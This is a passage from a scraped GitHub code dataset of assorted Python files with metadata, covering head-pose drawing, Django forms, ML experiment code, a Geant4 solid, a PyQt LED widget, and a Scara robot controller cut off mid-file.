occurrences with more leading to more \"\n \"verbose logging). WARN=0, INFO=1, \"\n \"DEBUG=2. This is overridden by the log config file if specified.\")\n cmd_args = parser.parse_args()\n\n logger = logging.getLogger(\"mongo_recorder\")\n logger.setLevel(logging.DEBUG)\n setup_logging(cmd_args)\n logger.info(\"Starting up.\")\n\n try:\n recorder = MongoRecorder(cmd_args.database)\n recorder.start()\n while True:\n time.sleep(1)\n except KeyboardInterrupt:\n recorder.stop()\n print(\"Thanks for using pytroll/mongo_recorder. See you soon on www.pytroll.org!\")\n","repo_name":"pytroll/pytroll-db","sub_path":"bin/pytroll-mongo.py","file_name":"pytroll-mongo.py","file_ext":"py","file_size_in_byte":3586,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"67"} +{"seq_id":"25689854150","text":"# Editor: 박민지\r\n\r\ndef abbreviation(name):\r\n token = name.split()\r\n abb = \"\"\r\n for item in token:\r\n if item[0].isupper():\r\n abb += str(item[0])\r\n return abb\r\n\r\ndef alphabetically_sorted(set):\r\n sorted_set = sorted(set)\r\n return sorted_set\r\n\r\n\r\nprint(\"1.Sorting Acronyms\")\r\nname_collector = []\r\nabb_collector = []\r\n\r\n# Get amount of name\r\nwhile True:\r\n try:\r\n name_amount = int(input(\"Enter amount of name: \"))\r\n break\r\n except ValueError:\r\n print(\"Input integer number only.\")\r\n continue\r\n\r\n# Get name for name_amount round\r\nfor count in range(name_amount):\r\n while True:\r\n temp_name = str(input(\"Enter name number \" + str(count + 1) + \": \"))\r\n for char in temp_name:\r\n if char.isnumeric():\r\n print(\"Number is not allow.\")\r\n break\r\n else:\r\n name_collector.append(temp_name)\r\n break\r\n\r\nfor word in name_collector:\r\n abb_collector.append(abbreviation(word))\r\n\r\nsorted_list = alphabetically_sorted(abb_collector)\r\n\r\nfor word in sorted_list:\r\n print(str(word))\r\n","repo_name":"PskPttw/The-Internship2021","sub_path":"Number01_Sorting_Acronyms.py","file_name":"Number01_Sorting_Acronyms.py","file_ext":"py","file_size_in_byte":1125,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"67"} +{"seq_id":"19519849503","text":"import math\n\ndef is_prime(number):\n if number == 1: return False\n\n for i in range(2, number):\n if number % i == 0:\n return False\n \n return True\n\ndef filter_prime(numbers):\n 
primes = []\n for num in numbers:\n if is_prime(num):\n primes.append(num)\n\n return primes\n\nx = [1, 10, 9, 7, 4, 3, 5, 124, 41]\ny = filter_prime(x)\n\nfor i in y:\n print(i)\n","repo_name":"LilLandau/pp2-22B030313","sub_path":"tsis3/filter_prime.py","file_name":"filter_prime.py","file_ext":"py","file_size_in_byte":413,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"67"} +{"seq_id":"28936264445","text":"import os\nimport numpy as np\nimport cv2\nimport scipy.io as sio\nfrom math import cos, sin\nfrom imutils import face_utils\n\ndef get_list_from_filenames(file_path):\n with open(file_path) as f:\n lines = f.read().splitlines()\n return lines\n\ndef plot_pose_cube(img, yaw, pitch, roll, tdx=None, tdy=None, size=150.):\n # Input is a cv2 image\n # pose_params: (pitch, yaw, roll, tdx, tdy)\n # Where (tdx, tdy) is the translation of the face.\n # For pose we have [pitch yaw roll tdx tdy tdz scale_factor]\n\n p = pitch * np.pi / 180\n y = -(yaw * np.pi / 180)\n r = roll * np.pi / 180\n if tdx != None and tdy != None:\n face_x = tdx - 0.50 * size\n face_y = tdy - 0.50 * size\n else:\n height, width = img.shape[:2]\n face_x = width / 2 - 0.5 * size\n face_y = height / 2 - 0.5 * size\n\n x1 = size * (cos(y) * cos(r)) + face_x\n y1 = size * (cos(p) * sin(r) + cos(r) * sin(p) * sin(y)) + face_y\n x2 = size * (-cos(y) * sin(r)) + face_x\n y2 = size * (cos(p) * cos(r) - sin(p) * sin(y) * sin(r)) + face_y\n x3 = size * (sin(y)) + face_x\n y3 = size * (-cos(y) * sin(p)) + face_y\n\n # Draw base in red\n cv2.line(img, (int(face_x), int(face_y)), (int(x1),int(y1)),(0,0,255),3)\n cv2.line(img, (int(face_x), int(face_y)), (int(x2),int(y2)),(0,0,255),3)\n cv2.line(img, (int(x2), int(y2)), (int(x2+x1-face_x),int(y2+y1-face_y)),(0,0,255),3)\n cv2.line(img, (int(x1), int(y1)), (int(x1+x2-face_x),int(y1+y2-face_y)),(0,0,255),3)\n # Draw pillars in blue\n cv2.line(img, (int(face_x), int(face_y)), (int(x3),int(y3)),(255,0,0),2)\n cv2.line(img, (int(x1), int(y1)), (int(x1+x3-face_x),int(y1+y3-face_y)),(255,0,0),2)\n cv2.line(img, (int(x2), int(y2)), (int(x2+x3-face_x),int(y2+y3-face_y)),(255,0,0),2)\n cv2.line(img, (int(x2+x1-face_x),int(y2+y1-face_y)), (int(x3+x1+x2-2*face_x),int(y3+y2+y1-2*face_y)),(255,0,0),2)\n # Draw top in green\n cv2.line(img, (int(x3+x1-face_x),int(y3+y1-face_y)), (int(x3+x1+x2-2*face_x),int(y3+y2+y1-2*face_y)),(0,255,0),2)\n cv2.line(img, (int(x2+x3-face_x),int(y2+y3-face_y)), (int(x3+x1+x2-2*face_x),int(y3+y2+y1-2*face_y)),(0,255,0),2)\n cv2.line(img, (int(x3), int(y3)), (int(x3+x1-face_x),int(y3+y1-face_y)),(0,255,0),2)\n cv2.line(img, (int(x3), int(y3)), (int(x3+x2-face_x),int(y3+y2-face_y)),(0,255,0),2)\n\n return img\n\ndef draw_axis(img, yaw, pitch, roll, tdx=None, tdy=None, size = 100):\n\n pitch = pitch * np.pi / 180\n yaw = -(yaw * np.pi / 180)\n roll = roll * np.pi / 180\n\n if tdx != None and tdy != None:\n tdx = tdx\n tdy = tdy\n else:\n height, width = img.shape[:2]\n tdx = width / 2\n tdy = height / 2\n\n # X-Axis pointing to right. 
drawn in red\n x1 = size * (cos(yaw) * cos(roll)) + tdx\n y1 = size * (cos(pitch) * sin(roll) + cos(roll) * sin(pitch) * sin(yaw)) + tdy\n\n # Y-Axis | drawn in green\n # v\n x2 = size * (-cos(yaw) * sin(roll)) + tdx\n y2 = size * (cos(pitch) * cos(roll) - sin(pitch) * sin(yaw) * sin(roll)) + tdy\n\n # Z-Axis (out of the screen) drawn in blue\n x3 = size * (sin(yaw)) + tdx\n y3 = size * (-cos(yaw) * sin(pitch)) + tdy\n\n cv2.line(img, (int(tdx), int(tdy)), (int(x1),int(y1)),(0,0,255),3)\n cv2.line(img, (int(tdx), int(tdy)), (int(x2),int(y2)),(0,255,0),3)\n cv2.line(img, (int(tdx), int(tdy)), (int(x3),int(y3)),(255,0,0),2)\n\n return img\n\n \ndef crop_face_loosely(shape, img, input_size):\n bbox, scale_x, scale_y = get_loosen_bbox(shape, img, input_size)\n crop_face = img[bbox[1]:bbox[3], bbox[0]:bbox[2]]\n crop_face = cv2.resize(crop_face, input_size)\n return crop_face\n\ndef get_loosen_bbox(shape, img, input_size):\n max_x = min(shape[2], img.shape[1])\n min_x = max(shape[0], 0)\n max_y = min(shape[3], img.shape[0])\n min_y = max(shape[1], 0)\n \n Lx = max_x - min_x\n Ly = max_y - min_y\n \n Lmax = int(max(Lx, Ly) * 2.0)\n \n delta = Lmax * 0.4\n \n center_x = (shape[2] + shape[0]) // 2\n center_y = (shape[3] + shape[1]) // 2\n start_x = int(center_x - delta)\n start_y = int(center_y - delta - 10)\n end_x = int(center_x + delta)\n end_y = int(center_y + delta - 10)\n \n if start_y < 0:\n start_y = 0\n if start_x < 0:\n start_x = 0\n if end_x > img.shape[1]:\n end_x = img.shape[1]\n if end_y > img.shape[0]:\n end_y = img.shape[0]\n\n scale_x = float(input_size[0]) / (end_x - start_x)\n scale_y = float(input_size[1]) / (end_y - start_y)\n return (start_x, start_y, end_x, end_y), scale_x, scale_y\n\n\ndef normalize_landmark_point(original_point, image_size):\n '''\n original_point: (x, y)\n image_size: (W, H)\n '''\n x, y = original_point\n x -= image_size[0] // 2\n y -= image_size[1] // 2\n x /= image_size[0]\n y /= image_size[1]\n return [x, y]\n\ndef unnormalize_landmark_point(normalized_point, image_size, scale=[1,1]):\n '''\n normalized_point: (x, y)\n image_size: (W, H)\n '''\n x, y = normalized_point\n x *= image_size[0]\n y *= image_size[1]\n x += image_size[0] // 2\n y += image_size[1] // 2\n x *= scale[0]\n y *= scale[1]\n return [x, y]\n\ndef unnormalize_landmark(landmark, image_size):\n image_size = np.array(image_size)\n landmark = np.multiply(np.array(landmark), np.array(image_size)) \n landmark = landmark + image_size / 2\n return landmark\n\ndef normalize_landmark(landmark, image_size):\n image_size = np.array(image_size)\n landmark = np.array(landmark) - image_size / 2\n landmark = np.divide(landmark, np.array(image_size))\n return landmark\n\ndef draw_landmark(img, landmark):\n im_width = img.shape[1]\n im_height = img.shape[0]\n img_size = (im_width, im_height)\n landmark = landmark.reshape((-1, 2))\n unnormalized_landmark = unnormalize_landmark(landmark, img_size)\n for i in range(unnormalized_landmark.shape[0]):\n img = cv2.circle(img, (int(unnormalized_landmark[i][0]), int(unnormalized_landmark[i][1])), 2, (0,255,0), 2)\n return img","repo_name":"vietanhdev/deep-head-pose-2","sub_path":"utils.py","file_name":"utils.py","file_ext":"py","file_size_in_byte":6010,"program_lang":"python","lang":"en","doc_type":"code","stars":3,"dataset":"github-code","pt":"67"} +{"seq_id":"70026028695","text":"from django import forms\nfrom django.contrib.auth.models import User\n\nfrom .models import *\n \nclass UserModelChoiceField(forms.ModelChoiceField):\n \n def __init__(self, 
queryset=None, empty_label=None, required=True):\n \n super(UserModelChoiceField, self).__init__(queryset=User.objects.none())\n self.queryset = User.objects.filter(profile__isnull=False)\n self.empty_label = empty_label\n self.required = required\n \n def label_from_instance(self, obj):\n return obj.profile.get_fullname()\n\nclass AssetIssuanceSearchForm(forms.Form):\n category = forms.ModelChoiceField(\n queryset=Category.objects.all(), \n empty_label='-- All --',\n required=False)\n employee = UserModelChoiceField(\n empty_label='-- All --',\n required=False)\n issue_status = forms.ChoiceField(\n choices=(\n (0, '-- Any --'), \n (1, 'Issued'), \n (2, 'Available')\n )\n )\nclass AssetIssuanceForm(forms.ModelForm):\n class Meta:\n model = AssetIssuance\n exclude = ('returned_date', 'return_comment')\n widgets = {\n 'asset': forms.HiddenInput()\n }\n employee = UserModelChoiceField()\n \nclass AssetReturnForm(forms.ModelForm):\n def __init__(self, *args, **kwargs):\n super(AssetReturnForm, self).__init__(*args, **kwargs)\n self.fields['returned_date'].widget = forms.HiddenInput()\n self.fields['asset'].widget = forms.HiddenInput()\n self.fields['returned_date'].widget = forms.HiddenInput()\n \n class Meta:\n model = AssetIssuance\n exclude = ()\n widgets = {\n# 'return_date': forms.HiddenInput(),\n 'return_comment': forms.Textarea(attrs={'cols': 30, 'rows': 4}),\n 'asset': forms.HiddenInput(),\n 'employee': forms.HiddenInput(),\n }\n \nclass AssetAllocationFormOld(forms.Form):\n def __init__(self, *args, **kwargs):\n cat_id = kwargs.pop('category')\n super(AssetAllocationForm, self).__init__(*args, **kwargs)\n self.fields['asset'].queryset = Asset.objects.filter(\n category__id=cat_id if cat_id else 1)\n\n q = Category.objects.all()\n self.fields['category'].queryset = q\n self.fields['category'].initial = Category.objects.get(pk=cat_id)\n self.fields['category'].widget.attrs = {\n 'onChange': \"post({}, {});\".format(\n '\"/asset/allocation/new/\"',\n {'from_post': 1}\n )\n }\n \n category = forms.ModelChoiceField(\n queryset=Category.objects.none(),\n empty_label = None\n )\n asset = forms.ModelChoiceField(\n queryset = Asset.objects.none()\n )\n \n class Media:\n js = ('js/hrp.js', )","repo_name":"PregTech-c/Hrp_system","sub_path":"asset/forms.py","file_name":"forms.py","file_ext":"py","file_size_in_byte":2818,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"67"} +{"seq_id":"72581160852","text":"from utils import *\nfrom preprocessing import preprocess\nfrom windowfy import windowfy\nfrom featurizing import featurize\nfrom tfidf_featurizer import combine_features, tfidf_featurize\nfrom training import train, do_ensemble, do_train, evaluate_dl_time\nfrom training_traditional import train_and_evaluate\nfrom training_traditional import evaluate as evaluate_trad_time\nfrom eval_erisk import evaluate, ensemble_vote\nfrom IPython.display import display, Markdown\nfrom itertools import product\nimport tensorflow\nimport numpy as np\nimport time\n\ndl_model_names = [\"cnn_model\", \"lstm_model_32\", \"lstm_model_16\", \"lstm_model\"]\ntrad_model_names = [\"svm\", \"bayes\"]\n \ndef traverse(d):\n K,V = zip(*d.items())\n for v in product(*(v if isinstance(v,list) else traverse(v) for v in V)):\n yield dict(zip(K,v))\n\nclass Experiment():\n \n def __init__(self, models, ensemble_combinations, eval_filename, random_seed=42, name=None):\n self.models = models\n self.ensemble_combinations = ensemble_combinations\n self.eval_filename = eval_filename\n if 
name is None:\n self.name = time.process_time()\n else:\n self.name = name\n self.seed = random_seed\n self.set_seed(random_seed)\n \n \n def prepare_data(self, params):\n logger(\"PREPARING DATA FOR PARAMS {}\".format(params))\n self.train_users, self.y_train, self.test_users, self.y_test, self.train_samples, self.X_train, self.X_test = windowfy(window_size=params[\"feat_window_size\"], max_size=params[\"max_size\"], sample_weights_size=params[\"sample_weights_size\"], is_oversample=params[\"oversample\"], include_new_data=params[\"include_new_data\"], sampling_strategy=params[\"sampling_strategy\"], random_state=self.seed)\n self.feats_train, self.feats_test = featurize(calculate_feats=True, \n include_feats=params[\"include_feats\"],\n train_users=self.train_users, test_users=self.test_users,\n discretize=params[\"discretize\"], \n discretize_size=params[\"discretize_size\"],\n dis_strategy=params[\"dis_strategy\"], \n normalize=params[\"normalize\"],\n scale=params[\"scale\"])\n self.tfidf_train, self.tfidf_test = tfidf_featurize(self.train_users, self.test_users, max_features=params[\"tfidf_max_features\"])\n\n self.feats_train_comb, self.feats_test_comb = combine_features([self.tfidf_train, self.feats_train], [self.tfidf_test, self.feats_test])\n\n self.feats_train_comb = self.feats_train_comb.toarray()\n self.feats_test_comb = self.feats_test_comb.toarray() \n \n def train_and_evaluate_model(self, params, weights_combinations=None):\n self.y_preds = {}\n params[\"weights\"] = None\n for model_name in self.models:\n params[\"model\"] = model_name\n if model_name in trad_model_names:\n logger(\"TRAINING AND EVALUATING TRADITIONAL MODEL {}\".format(model_name))\n y_pred, classifier = train_and_evaluate(self.feats_train_comb, self.y_train, self.feats_test_comb, self.y_test, self.train_samples, classifier_name=model_name, strategy=\"weights\")\n t = time.process_time()\n logger(\"Evaluating after getting time {}\".format(t))\n evaluate_trad_time(classifier, self.feats_test_comb, self.y_test)\n elapsed_time = time.process_time() - t\n logger(\"Evaluated with elapsed time {}\".format(elapsed_time))\n else:\n logger(\"TRAINING AND EVALUATING DL MODEL {}\".format(model_name))\n y_pred = self.iterate_dl_model(params)\n logger(\"Evaluating for elapsed time\")\n elapsed_time = evaluate_dl_time(model_name=params[\"model\"], maxlen=params[\"maxlen\"], epochs=params[\"epochs\"],\n batch_size=params[\"batch_size\"],\n shuffle=params[\"shuffle\"], patience=params[\"patience\"], \n feats_train=self.feats_train, feats_test=self.feats_test, \n X_train=self.X_train, X_test=self.X_test, y_train=self.y_train, y_test=self.y_test, \n train_sample_weights=self.train_samples, name=self.name)\n logger(\"Evaluated with elapsed time {}\".format(elapsed_time))\n logger(\"EVALUATING FOR WINDOW SIZES 1, 2 AND 3 MODEL {}\".format(model_name))\n params[\"eval_time\"] = elapsed_time\n params[\"eval_window_size\"] = 1\n eval_resul = evaluate(1, 10, params, y_pred=y_pred, test_users=self.test_users, resuls_file=self.eval_filename)\n params[\"eval_window_size\"] = 2\n eval_resul = evaluate(2, 10, params, y_pred=y_pred, test_users=self.test_users, resuls_file=self.eval_filename)\n params[\"eval_window_size\"] = 3\n eval_resul = evaluate(3, 10, params, y_pred=y_pred, test_users=self.test_users, resuls_file=self.eval_filename)\n \n self.y_preds[model_name] = y_pred\n\n for ensemble_ver in self.ensemble_combinations:\n if weights_combinations is None:\n weights_combinations = [[1,1,1]]\n \n for weights in 
weights_combinations:\n logger(\"EVALUATING ENSEMBLE {} with weights {}\".format(ensemble_ver, weights))\n ensemble_preds = [self.y_preds[model_name] for model_name in ensemble_ver]\n ensemble_preds = np.array(ensemble_preds)\n y_pred = ensemble_vote(ensemble_preds, weights)\n\n params[\"model\"] = ensemble_ver\n params[\"weights\"] = weights\n\n logger(\"EVALUATING ENSEMBLE {} WITH WEIGHTS {} FOR WINDOW SIZES 1, 2 AND 3\".format(ensemble_ver, weights))\n params[\"eval_window_size\"] = 1\n eval_resul = evaluate(1, 10, params, y_pred=y_pred, test_users=self.test_users, resuls_file=self.eval_filename)\n params[\"eval_window_size\"] = 2\n eval_resul = evaluate(2, 10, params, y_pred=y_pred, test_users=self.test_users, resuls_file=self.eval_filename)\n params[\"eval_window_size\"] = 3\n eval_resul = evaluate(3, 10, params, y_pred=y_pred, test_users=self.test_users, resuls_file=self.eval_filename) \n \n \n def iterate_dl_model(self, params):\n \n model_resuls = {}\n iterations = params[\"iterations\"]\n logger(\"STARTING ITERATION FOR DL MODEL {} FOR {} ITERATIONS\".format(params[\"model\"], params[\"iterations\"]))\n for i in range(0, iterations):\n y_pred = do_train(model_name=params[\"model\"], maxlen=params[\"maxlen\"], epochs=params[\"epochs\"],\n batch_size=params[\"batch_size\"],\n shuffle=params[\"shuffle\"], patience=params[\"patience\"], \n feats_train=self.feats_train, feats_test=self.feats_test, \n X_train=self.X_train, X_test=self.X_test, y_train=self.y_train, y_test=self.y_test, \n train_sample_weights=self.train_samples, name=self.name)\n eval_resul = evaluate(1, 10, params, y_pred=y_pred, test_users=self.test_users, save=False)\n model_resuls[eval_resul['latency_weighted_f1']] = y_pred.flatten()\n\n return model_resuls[max(model_resuls.keys())]\n \n def set_seed(self, seed_num):\n np.random.seed(seed_num)\n tensorflow.random.set_seed(seed_num)\n logger(\"Initialized numpy random and tensorflow random seed at {}\".format(seed_num))","repo_name":"ele94/early-risk-ensemble","sub_path":"experiment_utils.py","file_name":"experiment_utils.py","file_ext":"py","file_size_in_byte":7789,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"67"} +{"seq_id":"8017509037","text":"from ... 
import config as _config\n\nfrom .SolidBase import SolidBase as _SolidBase\nfrom .TwoVector import TwoVector as _TwoVector\nfrom .Layer import Layer as _Layer\nfrom .TwistedSolid import TwistedSolid as _TwistedSolid\n\nimport numpy as _np\nimport logging as _log\n\n\nclass TwistedTrd(_SolidBase, _TwistedSolid):\n \"\"\"\n Constructs a twisted general trapezoid.\n\n :param name: of solid\n :type name: str\n :param twistedangle: twist angle, must be less than 0.5*pi\n :type twistedangle: float, Constant, Quantity, Variable, Expression\n :param pDx1: length in x at surface positioned at -pDz/2\n :type pDx1: float, Constant, Quantity, Variable, Expression\n :param pDx2: length in x at surface positioned at +pDz/2\n :type pDx2: float, Constant, Quantity, Variable, Expression\n :param pDy1: length in y at surface positioned at -pDz/2\n :type pDy1: float, Constant, Quantity, Variable, Expression\n :param pDy2: length in y at surface positioned at +pDz/2\n :type pDy2: float, Constant, Quantity, Variable, Expression\n :param pDz: length in z\n :type pDz: float, Constant, Quantity, Variable, Expression\n :param refine: number of steps to iteratively smoothen the mesh by doubling the number of vertices at every step\n :type refine: int\n :param registry: for storing solid\n :type registry: Registry\n :param lunit: length unit (nm,um,mm,m,km) for solid\n :type lunit: str\n :param aunit: angle unit (rad,deg) for solid\n :type aunit: str\n :param nstack: number of theta elements for meshing\n :type nstack: int\n \"\"\"\n\n def __init__(\n self,\n name,\n twistedangle,\n pDx1,\n pDx2,\n pDy1,\n pDy2,\n pDz,\n registry,\n lunit=\"mm\",\n aunit=\"rad\",\n nstack=None,\n refine=0,\n addRegistry=True,\n ):\n super().__init__(name, \"TwistedTrd\", registry)\n\n self.twistedAngle = twistedangle\n self.pDx1 = pDx1\n self.pDx2 = pDx2\n self.pDy1 = pDy1\n self.pDy2 = pDy2\n self.pDz = pDz\n self.lunit = lunit\n self.aunit = aunit\n self.nstack = nstack if nstack else _config.SolidDefaults.TwistedTrap.nstack\n self.refine = refine\n\n self.dependents = []\n\n self.varNames = [\"twistedAngle\", \"pDx1\", \"pDx2\", \"pDy1\", \"pDy2\", \"pDz\"]\n self.varUnits = [\"aunit\", \"lunit\", \"lunit\", \"lunit\", \"lunit\", \"lunit\"]\n\n self.checkParameters()\n\n if addRegistry:\n registry.addSolid(self)\n\n def __repr__(self):\n return \"TwistedTrd : {} {} {} {} {} {} {}\".format(\n self.name,\n self.twistedAngle,\n self.pDx1,\n self.pDx2,\n self.pDy1,\n self.pDy2,\n self.pDz,\n )\n\n def __str__(self):\n return \"TwistedTrd : name={} twistedAngle={} dx1={} dx2={} dy1={} dy2={} dz={}\".format(\n self.name,\n self.twistedAngle,\n self.pDx1,\n self.pDx2,\n self.pDy1,\n self.pDy2,\n self.pDz,\n )\n\n def checkParameters(self):\n if self.evaluateParameterWithUnits(\"twistedAngle\") > _np.pi:\n msg = \"Twisted Angle must be less than 0.5*pi\"\n raise ValueError(msg)\n\n def makeLayers(self, pl1, pl2, pl3, pl4, pu1, pu2, pu3, pu4, pDz, theta, nsl):\n dz = 2 * pDz / nsl\n dtheta = theta / nsl\n z = -pDz\n\n layers = []\n\n bottom = _Layer(pl1, pl2, pl3, pl4, z)\n bottom = bottom.Rotated(-theta * 0.5) # overwrite\n layers.append(bottom)\n\n for i in range(nsl):\n pn1 = pl1 + float(i + 1) * (pu1 - pl1) / nsl\n pn2 = pl2 + float(i + 1) * (pu2 - pl2) / nsl\n pn3 = pl3 + float(i + 1) * (pu3 - pl3) / nsl\n pn4 = pl4 + float(i + 1) * (pu4 - pl4) / nsl\n\n z += dz # increment z\n n = _Layer(pn1, pn2, pn3, pn4, z)\n angle = -theta * 0.5 + float(i + 1) * dtheta\n nr = n.Rotated(angle) # returns rotated copy\n layers.append(nr)\n\n return 
layers\n\n    def mesh(self):\n        _log.info(\"twistedtrd.pycsgmesh> antlr\")\n\n        import pyg4ometry.gdml.Units as _Units # TODO move circular import\n\n        luval = _Units.unit(self.lunit)\n        auval = _Units.unit(self.aunit)\n\n        twistedAngle = self.evaluateParameter(self.twistedAngle) * auval\n        pDx1 = self.evaluateParameter(self.pDx1) / 2.0 * luval\n        pDx2 = self.evaluateParameter(self.pDx2) / 2.0 * luval\n        pDy1 = self.evaluateParameter(self.pDy1) / 2.0 * luval\n        pDy2 = self.evaluateParameter(self.pDy2) / 2.0 * luval\n        pDz = self.evaluateParameter(self.pDz) / 2.0 * luval\n\n        _log.info(\"twistedtrd.mesh> mesh\")\n        pl1 = _TwoVector(-pDx1, -pDy1) # , pDz]\n        pl2 = _TwoVector(pDx1, -pDy1) # pDz]\n        pl3 = _TwoVector(pDx1, pDy1) # pDz]\n        pl4 = _TwoVector(-pDx1, pDy1) # pDz]\n\n        pu1 = _TwoVector(-pDx2, -pDy2) # , pDz]\n        pu2 = _TwoVector(pDx2, -pDy2) # pDz]\n        pu3 = _TwoVector(pDx2, pDy2) # pDz]\n        pu4 = _TwoVector(-pDx2, pDy2) # pDz]\n\n        m = self.makeLayers(pl1, pl2, pl3, pl4, pu1, pu2, pu3, pu4, pDz, twistedAngle, self.nstack)\n\n        return self.meshFromLayers(m, self.nstack)\n","repo_name":"g4edge/pyg4ometry","sub_path":"src/pyg4ometry/geant4/solid/TwistedTrd.py","file_name":"TwistedTrd.py","file_ext":"py","file_size_in_byte":5550,"program_lang":"python","lang":"en","doc_type":"code","stars":5,"dataset":"github-code","pt":"67"}
{"seq_id":"71662870294","text":"from PyQt5.QtWidgets import QWidget\nfrom PyQt5.QtCore import (QByteArray, QPointF, QRectF, QTimer,\n                          pyqtProperty, pyqtSlot)\nfrom PyQt5.QtGui import QPainter\nfrom PyQt5.QtSvg import QSvgRenderer\nimport os\nimport sys\n\n\nclass QLedWidget(QWidget):\n    '''LED indicator\n\n    ...\n\n    Inherits\n    --------\n    PyQt5.QtWidgets.QWidget\n\n    Properties\n    ==========\n\n    Colors\n    ------\n    RED, AMBER, GREEN, BLUE, VIOLET\n\n    States\n    ------\n    ON, OFF\n\n    color: Colors\n        Color of the LED indicator\n    state: States\n        ON: LED is bright\n        OFF: LED is dark\n    blink: bool\n        True: LED alternates between ON and OFF\n        False: LED returns to its initial state\n    interval: int\n        Duration of each state during blinking\n        in milliseconds\n    '''\n\n    RED = 1\n    AMBER = 2\n    GREEN = 3\n    BLUE = 4\n    VIOLET = 5\n\n    OFF = 1\n    ON = 2\n\n    hexcodes = {RED: {OFF: ('#3f0000', '#a00000'),\n                      ON: ('#af0000', '#ff0f0f')},\n                AMBER: {OFF: ('#aa4400', '#ad892c'),\n                        ON: ('#d45500', '#ffd42a')},\n                GREEN: {OFF: ('#001c00', '#008200'),\n                        ON: ('#009400', '#00d700')},\n                BLUE: {OFF: ('#102151', '#0a163c'),\n                       ON: ('#082686', '#0342eb')},\n                VIOLET: {OFF: ('#45098f', '#471b7d'),\n                         ON: ('#5a00cc', '#a65fff')}}\n\n    def __init__(self, *args,\n                 color=None,\n                 state=None,\n                 blink=None,\n                 interval=None,\n                 **kwargs):\n        super().__init__(*args, **kwargs)\n        self.setMinimumSize(48, 48)\n        self.sizePolicy().setWidthForHeight(True)\n        self.template = self._get_template()\n        self.renderer = QSvgRenderer()\n        self.timer = QTimer()\n        self.color = color or self.RED\n        self.state = state or self.ON\n        self.blink = blink or False\n        self.interval = interval or 400\n        self._connectSignals()\n\n    @pyqtProperty(int)\n    def color(self):\n        return self._color\n\n    @color.setter\n    def color(self, value):\n        self._color = value\n        self.update()\n\n    @pyqtProperty(int)\n    def state(self):\n        return self._state\n\n    @state.setter\n    def state(self, value):\n        self._state = value\n        self._setstate = value\n        self.update()\n\n    @pyqtProperty(bool)\n    def blink(self):\n        return self._blink\n\n    @blink.setter\n    def blink(self, blink):\n        self._blink = blink\n        if blink:\n            self.timer.start(self.interval)\n        else:\n            self.timer.stop()\n            self.state = 
self._setstate\n\n @pyqtProperty(int)\n def interval(self):\n return self._interval\n\n @interval.setter\n def interval(self, value):\n self._interval = abs(value)\n\n @pyqtSlot()\n def flipState(self):\n self.state = self.ON if self.state is self.OFF else self.OFF\n\n def _get_template(self):\n file = sys.modules[self.__module__].__file__\n dir = os.path.dirname(os.path.abspath(file))\n path = os.path.join(dir, 'QLedWidget.txt')\n with open(path, 'r') as f:\n template = f.read()\n return template\n\n def _connectSignals(self):\n self.timer.timeout.connect(self.flipState)\n\n def paintEvent(self, event):\n painter = QPainter(self)\n painter.setRenderHint(QPainter.Antialiasing, True)\n hexcodes = self.hexcodes[self.color][self.state]\n _xml = self.template.format(*hexcodes).encode('utf-8')\n self.renderer.load(QByteArray(_xml))\n self.renderer.render(painter, self._bounds())\n\n def _bounds(self):\n x, y = self.size().width()/2., self.size().height()/2.\n dim = min(x, y)\n return QRectF(QPointF(x-dim, y-dim), QPointF(x+dim, y+dim))\n\n\nif __name__ == '__main__':\n from PyQt5.QtWidgets import QApplication\n\n app = QApplication(sys.argv)\n widget = QLedWidget()\n widget.color = widget.VIOLET\n widget.blink = True\n widget.show()\n sys.exit(app.exec_())\n","repo_name":"davidgrier/QInstrument","sub_path":"widgets/QLedWidget.py","file_name":"QLedWidget.py","file_ext":"py","file_size_in_byte":4115,"program_lang":"python","lang":"en","doc_type":"code","stars":2,"dataset":"github-code","pt":"67"} +{"seq_id":"31401092537","text":"# =============================== Errors Handling ===============================\r\n\r\n\r\n# try:\r\n# f = open(\"my_file.txt\", \"r\")\r\n \r\n# print(10/0)\r\n \r\n# except FileNotFoundError as e:\r\n# print(e)\r\n \r\n# except NameError as e:\r\n# print(e)\r\n\r\n# except Exception as e:\r\n# print(e)\r\n\r\n# else:\r\n# print(f.read())\r\n# f.close()\r\n\r\ntry:\r\n f = open(\"danger.txt\", \"r\")\r\n if f.name == \"danger.txt\":\r\n raise Exception\r\n \r\nexcept Exception as e:\r\n print(\"This file is corrupted.\")\r\nelse:\r\n print(f.read())\r\n f.close()\r\n\r\n\r\n","repo_name":"yahyaaly151989/freeCodeCamp","sub_path":"25_Errors_Handling.py","file_name":"25_Errors_Handling.py","file_ext":"py","file_size_in_byte":568,"program_lang":"python","lang":"en","doc_type":"code","stars":3,"dataset":"github-code","pt":"67"} +{"seq_id":"35588373512","text":"#Proudly brought to you by IOIA/ReverbLand. 
For support please email Daniel Górny at dadmin.dgor@gmail.com\nfrom machine import UART\nimport time, re, gc\n\nclass Scara():\n sock = None\n\n def flush(self):\n r = self.sock.readline()\n print(\"flush:\", end=\"\")\n while r == None:\n time.sleep_ms(10)\n r = self.sock.readline()\n print(\".\", end=\"\")\n print(\"OK\")\n\n def send(self, what, flush=False):\n print(\"send\",what)\n self.sock.write(\"%s\"%what)\n if flush:\n self.flush()\n\n def readuntil(self, what, max=100):\n found = False\n retry = 0\n out = None\n while True:\n r = self.sock.read(4096)\n if r:\n #print(\"recv\",r)\n if what in r:\n found = True\n out = r\n break\n elif r==None:\n print(\".\", end=\"\")\n retry = retry + 1\n if retry == max:\n break\n time.sleep_ms(10)\n print(\"OK\")\n if found==False:\n print(\"Error in\", what, out)\n return (found, r)\n\n def __init__(self, addr):\n self.sock = UART(3, 115200)\n self.sock.writechar(4) #disconnect\n time.sleep(0.1)\n self.sock.write(\"C%s/23\\n\"%addr) #connect\n if self.readuntil(\"login:\")[0]==True:\n self.send(\"KCL\\n\")\n if self.readuntil(\"password:\")[0]==True:\n self.send(\"1111\\n\")\n if self.readuntil(\"User logged in\")[0]==True:\n self.send(\"SET DEFAULT przerzutki2\\r\\n\", flush=True)\n\n def set_flag(self, val):\n self.send(\"SET VAR FLAG_IN=%s\\r\\n\"%val, flush=True)\n\n def get_flag(self):\n self.send(\"SHOW VAR FLAG_OUT\\r\\n\\r\\n\")\n out = \"\"\n ret = 